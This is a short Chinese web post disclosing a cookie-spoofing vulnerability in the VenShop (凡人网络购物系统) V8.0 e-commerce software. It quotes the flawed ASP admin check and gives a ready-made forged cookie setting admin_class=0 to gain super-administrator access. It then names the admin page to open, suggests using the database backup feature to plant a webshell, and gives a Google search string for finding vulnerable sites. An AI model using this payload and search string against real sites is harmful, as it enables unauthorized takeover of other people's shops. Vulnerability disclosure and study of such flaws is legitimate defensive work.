当前位置:
首页 > 其他 > 凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞

凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞

代码http://www.venshop.com/down/venshop.rar
小程序,备忘一下
ad_chk.asp判断管理员登陆状态
<% if Request.Cookies("venshop")("admin_name")="" or Request.Cookies("venshop")("admin_pass")="" or Request.Cookies("venshop")("admin_class")="" then Response.Cookies("venshop")("admin_name")="" Response.Cookies("venshop")("admin_pass")="" Response.Cookies("venshop")("admin_class")="" response.redirect "ad_login.asp" response.end end if 判断admin_class C:\Inetpub\wwwroot>findstr /i /n /s "admin_class" *.asp
ad_admin.asp:29: rs("admin_class")=request("class1")
ad_admin.asp:43:rs("admin_class")=request("class")
ad_admin.asp:92:ad_admin.asp:93:ad_admin.asp:94:

可以看出当admin_class=0的时候就是总管理员身份了。
伪造cookie如下
Themes=default;Count=lao=3;Countecho=lao=True;ASPSESSIONIDQAADRSRB=CDBDHEHCLJOIHFDAHLFHABIO; venshop=admin%5Fclass=0&admin%5Fpass=admin&admin%5Fname=admin
然后访问http://www.target.com/ad_manage.asp即可,后台有数据库备份可以拿webshell。
inurl:"views.asp?hw_id="#google

凡人网络购物系统 V8.0 简体中文版 Cookie欺骗漏洞:等您坐沙发呢!

发表评论

表情
还能输入210个字